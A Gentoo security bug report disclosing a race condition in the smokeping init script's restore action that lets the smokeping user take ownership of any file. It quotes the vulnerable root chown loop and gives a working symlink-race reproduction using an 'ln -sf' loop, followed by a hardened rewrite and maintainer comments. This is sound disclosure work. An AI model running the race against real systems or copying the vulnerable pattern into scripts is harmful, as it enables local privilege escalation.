
Bug 602652

Summary: net-analyzer/smokeping: root privilege escalation via race condition in init script
Product: Gentoo Security
Reporter: Michael Orlitzky <mjo>
Component: Vulnerabilities
Assignee: Gentoo Security Audit Team <security-audit>
Status: IN_PROGRESS ---
Severity: major
CC: jer, treecleaner, vapier, zerochaos
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
Whiteboard: B1 [ebuild]
Package list:
Runtime testing required: ---

Description Michael Orlitzky gentoo-dev 2016-12-14 15:47:14 UTC
The smokeping ebuilds give ownership of /var/lib/smokeping to the "smokeping" user:

  fowners smokeping:smokeping /var/lib/${PN}

The init script has a "restore" command that trusts the contents of that directory too much:

  for f in `find /var/lib/smokeping -name '*.xml' -print` ; do
      f_rrd=`dirname $f`/`basename $f .xml`.rrd
      mv -f "${f_rrd}" "${f_rrd}.bak"
      chown root:0 "${f_rrd}.bak"
      rrdtool restore "$f" "${f_rrd}"
      # race window: ${f_rrd} may have become a symlink by the time this runs
      chown smokeping:smokeping "${f_rrd}"
  done

The last "chown" can be used to gain root privileges, because $f_rrd can be changed to a symlink between the "mv" and "chown" calls.

I was actually able to exploit this. First, create some files (as the smokeping user) so that the "find" command above has something to play with:

  $ ln -sf /home/mjo/foo.txt /var/lib/smokeping/test.rrd
  $ touch /var/lib/smokeping/test.xml

Now the "restore" action will rename test.rrd, attempt to restore a dump, and then call chown on test.rrd, which it expects contains the restored data. But you can trick it: as the smokeping user, execute,

  while true; do ln -sf /home/mjo/foo.txt /var/lib/smokeping/test.rrd; done;

If you're lucky, one of those links will get created between the "mv" and the "chown", and the init script will change ownership of the symlink target to smokeping:smokeping. (On my machine, it changes /home/mjo/foo.txt to smokeping:smokeping.)

Thus the smokeping user can take ownership of any file on the system.
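A race-free way to write the same "restore" action, added here as an example (it is not the Gentoo init script): the loop is run as the smokeping user, so root never performs the mv, the restore or the trailing chown inside the user-owned directory. It assumes an unprivileged "smokeping" account exists and that su accepts `-s SHELL -c CMD USER ARGS...` (util-linux and busybox do).

```shell
# Hardened "restore" action, added as an example; not the Gentoo init script.
# The original restores as root and then chowns the result inside a directory
# the smokeping user owns, which is the window the report races. Here the
# whole loop is executed as that user instead, so root never mv's, writes or
# chowns anything under the directory, no fix-up chown is needed, and a
# symlink planted by that user can only redirect writes to files the user may
# already write. Assumptions: an unprivileged "smokeping" account exists and
# su accepts `-s SHELL -c CMD USER ARGS...` (util-linux and busybox do).

# The loop body is kept as a string so that exactly the same code runs either
# under the current identity or under su. $1 is the data directory.
RESTORE_LOOP='
dir=$1
# Read find output line by line instead of word-splitting a backtick expansion.
find "$dir" -name "*.xml" -print | while IFS= read -r f; do
    f_rrd=${f%.xml}.rrd
    # Keep the previous database; mv on a symlink renames the link itself.
    if [ -e "$f_rrd" ] || [ -L "$f_rrd" ]; then
        mv -f "$f_rrd" "$f_rrd.bak" || exit 1
    fi
    # No chown afterwards: the file is created by the user who should own it.
    rrdtool restore "$f" "$f_rrd" || exit 1
done
'

# restore_rrd_dumps DIR: run the loop as the calling (unprivileged) user.
# Returns non-zero if any mv or restore failed.
restore_rrd_dumps() {
    sh -c "$RESTORE_LOOP" restore "$1"
}

# restore_as USER DIR: init-script entry point. Drops from root to USER before
# anything under DIR is touched; when not root, it already runs unprivileged.
restore_as() {
    if [ "$(id -u)" -eq 0 ]; then
        su -s /bin/sh -c "$RESTORE_LOOP" "$1" restore "$2"
    else
        restore_rrd_dumps "$2"
    fi
}
```

With a symlink in place of test.rrd, the link is merely renamed to test.rrd.bak and the restored database is a fresh regular file; whatever the link pointed at is left untouched.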
Comment 1 Thomas Deutschmann gentoo-dev Security 2017-01-08 23:26:13 UTC
@ Maintainer(s): Please tell us how you want to proceed here. Should security take action or will you look into this?
Comment 2 Thomas Deutschmann gentoo-dev Security 2019-12-26 15:28:35 UTC
This is now public.

Please take action (if you cannot fix it but still care about the package, drop the restore function from the runscript at least) or let treecleaners last rite.